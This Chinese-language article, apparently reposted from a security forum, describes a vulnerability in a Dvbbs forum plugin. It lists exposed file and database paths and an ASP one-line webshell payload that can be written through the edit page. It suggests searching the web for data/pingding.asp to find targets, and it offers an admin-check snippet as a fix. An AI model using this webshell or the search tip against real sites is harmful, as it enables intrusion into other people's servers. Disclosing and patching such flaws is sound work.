插件比较乱,有很多,比如前台就是
z_disadmin.asp
z_disadmin_edit.asp
z_disadminconn.asp
后台在data/#pingding.mdb
有的后台在data/pingding.asp
有的则在data/disadmin_db.asp
另外有的后台会这样Data_plus/something的!
当然可以暴库,关键就是z_disadminconn.asp过滤不严,但是必须要找到它的所在,而且要二级。
利用的方法:
--------------------------------
关于mdb作数据库的,那当然没什么危险,这个漏洞也只能算是个鸡肋。
但是对于asp作数据库的,却有利用的方法。
这都是因为edit中一个update的错误,大部分字段都是整型的,因为数据库的规定
而有一个字段是可以写入木马的。
虽然长度有限制,但是够写一个微型木马了,我用<%execute request("allyesno")%>
对于暂时的防范,可以在edit中加入一个过滤参数:
-----------codz begin----------------
Head()
dim admin_flag,isEdit,boname,msgtitle,msginfo,SubRs
admin_flag="22"
if not Dvbbs.master or instr(session("flag"),admin_flag)=0 then
Errmsg=ErrMsg + "<BR><li>本页面为管理员专用,请<a href=admin_index.asp target=_top>
登陆</a>后进入。<br><li>您没有管理本页面的权限。"
dvbbs_error()
end if
-------------codz end---------------
总而言之,只能说明开发插件的人头脑有问题。
虽然利用不大,扩散不广。但是还是有得玩的!
具体攻击:
应该是搜索data/pingding.asp。一般这个数据库没人改的
延伸阅读
文章来源于领测软件测试网 https://www.ltesting.net/
关于领测软件测试网 | 领测软件测试网合作伙伴 | 广告服务 | 投稿指南 | 联系我们 | 网站地图 | 友情链接
版权所有(C) 2003-2010 TestAge(领测软件测试网)|领测国际科技(北京)有限公司|软件测试工程师培训网 All Rights Reserved
北京市海淀区中关村南大街9号北京理工科技大厦1402室 京ICP备10010545号-5
技术支持和业务联系:info@testage.com.cn 电话:010-51297073
版权所有(C) 2003-2010 TestAge(领测软件测试网)|领测国际科技(北京)有限公司|软件测试工程师培训网 All Rights Reserved
北京市海淀区中关村南大街9号北京理工科技大厦1402室 京ICP备10010545号-5
技术支持和业务联系:info@testage.com.cn 电话:010-51297073